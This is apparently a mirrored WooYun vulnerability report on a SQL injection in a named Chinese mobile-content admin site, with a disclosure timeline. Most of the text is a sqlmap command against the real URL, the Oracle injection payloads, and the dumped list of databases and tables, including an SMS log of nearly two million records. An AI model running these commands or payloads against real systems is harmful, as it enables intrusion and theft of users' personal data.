乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-04-08: 细节已通知厂商并且等待厂商处理中 2015-04-10: 厂商已经确认,细节仅向厂商公开 2015-04-20: 细节向核心白帽子及相关领域专家公开 2015-04-30: 细节向普通白帽子公开 2015-05-10: 细节向实习白帽子公开 2015-05-25: 细节向公众公开
洞是越挖越多了....
http://admin.unisk.cn/
sqlmap.py -u "http://admin.unisk.cn/count2.asp?id=291308&speid=127" --dbms=oracle --level 3 --dbs
---Parameter: speid (GET) Type: boolean-based blind Title: Oracle boolean-based blind - Parameter replace Payload: id=291308&speid=(SELECT (CASE WHEN (9857=9857) THEN 9857 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) Type: error-based Title: Oracle error-based - Parameter replace Payload: id=291308&speid=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(106)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (2091=2091) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(98)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL) Type: AND/OR time-based blind Title: Oracle time-based blind - Parameter replace (heavy queries) Payload: id=291308&speid=(SELECT (CASE WHEN (6576=6576) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 6576 END) FROM DUAL)---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Oracleavailable databases [7]:[*] CTXSYS[*] EXFSYS[*] MDSYS[*] OLAPSYS[*] SYS[*] SYSTEM[*] TSH_CMS
---Parameter: speid (GET) Type: boolean-based blind Title: Oracle boolean-based blind - Parameter replace Payload: id=291308&speid=(SELECT (CASE WHEN (9857=9857) THEN 9857 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) Type: error-based Title: Oracle error-based - Parameter replace Payload: id=291308&speid=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(106)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (2091=2091) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(98)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL) Type: AND/OR time-based blind Title: Oracle time-based blind - Parameter replace (heavy queries) Payload: id=291308&speid=(SELECT (CASE WHEN (6576=6576) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 6576 END) FROM DUAL)---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: OracleDatabase: TSH_CMS[82 tables]+--------------------------------+| AUTHOR_LIST || AUTO_ID_LIBRARY || FROM_LIST || KEYWORD_LIST || LINK_LIST || LOGIN_LOG || MANAGER_BASE || MANAGER_INFO1 || ONLINE_MANAGE_RESCLASS_POPEDOM || PLAN_TABLE || POPEDOM_LIST || POPEDOM_ROLE || PROVINCE || RESOURCE_COUNT || RESOURCE_DATA || RESOURCE_LIST || RES_CLASS_LIST || SLICE_LIST || SLICE_PACKAGE_LIST || SMS_BONUS || SMS_RCV_BUF || SMS_REPORT || SMS_SEND || SMS_SEND_BUF0 || SMS_SEND_BUF1 || SMS_SYS_INFO || SMS_TRANS || SMS_UPLOAD || SMS_UPLOAD_VALID || SPECIAL_LIST || SYS_INFO || SYS_LOG_LIST || TAB_ACCOUNT_LOTTERY || TAB_CARD_LOTTERY || TAB_CATEGORY || TAB_CHARGEMODE || TAB_CITY || TAB_DISTRICT || TAB_INSTRUCTIONS || TAB_MICROBLOG || TAB_OFFICE || TAB_PACKAGE || TAB_PAYMENTTYPE || TAB_PHONE || TAB_PHONEBRAND || TAB_PHONENUM_COLLECT || TAB_PHONE_DETAIL || TAB_PHONE_TEST || TAB_PHONE_TEST_DETAIL || TAB_PROVINCE || TAB_RESTRICT_WORD || TAB_UNISK_CONTACT || TAB_USER || TAB_USER_LOTTERY || TAB_WINNER_LOTTERY || TEMPLATE_LIST || TSH_CMS || USER_CHARGEBACK_LIST || USER_COMMENT || USER_INFO || USER_RECHARGE_LIST || USER_SERVICE || USER_SMS_LIST || USER_VIEW || USER_VIEW_ADMIN || USER_VIEW_ADMIN_BAK || USER_VIEW_ADMIN_BAK_TMP || USER_VIEW_ADMIN_DAY || USER_VIEW_BAK || USER_VIEW_BAK_2013 || USER_VIEW_BAK_TMP || USER_VIEW_DAY || USER_VIEW_FROMURL_DAY || USER_VIEW_FROMURL_DAY2013 || USER_VIEW_PRO_TOTAL_DAY || USER_VIEW_RES_TOTAL_DAY || USER_VIEW_TOTAL_DAY || USER_VIEW_VCOUNT_CHAINCOMP || WAP_MENUSLIST || WAP_MOBILEPIC || WAP_MOBILEUA || WAP_NEWSPIC |+--------------------------------+
短信发送记录1968257条
你懂的
危害等级:高
漏洞Rank:10
确认时间:2015-04-10 18:35
已经由CNVD通过网站公开联系方式(或以往建立的处置渠道)向网站管理单位(软件生产厂商)通报。
暂无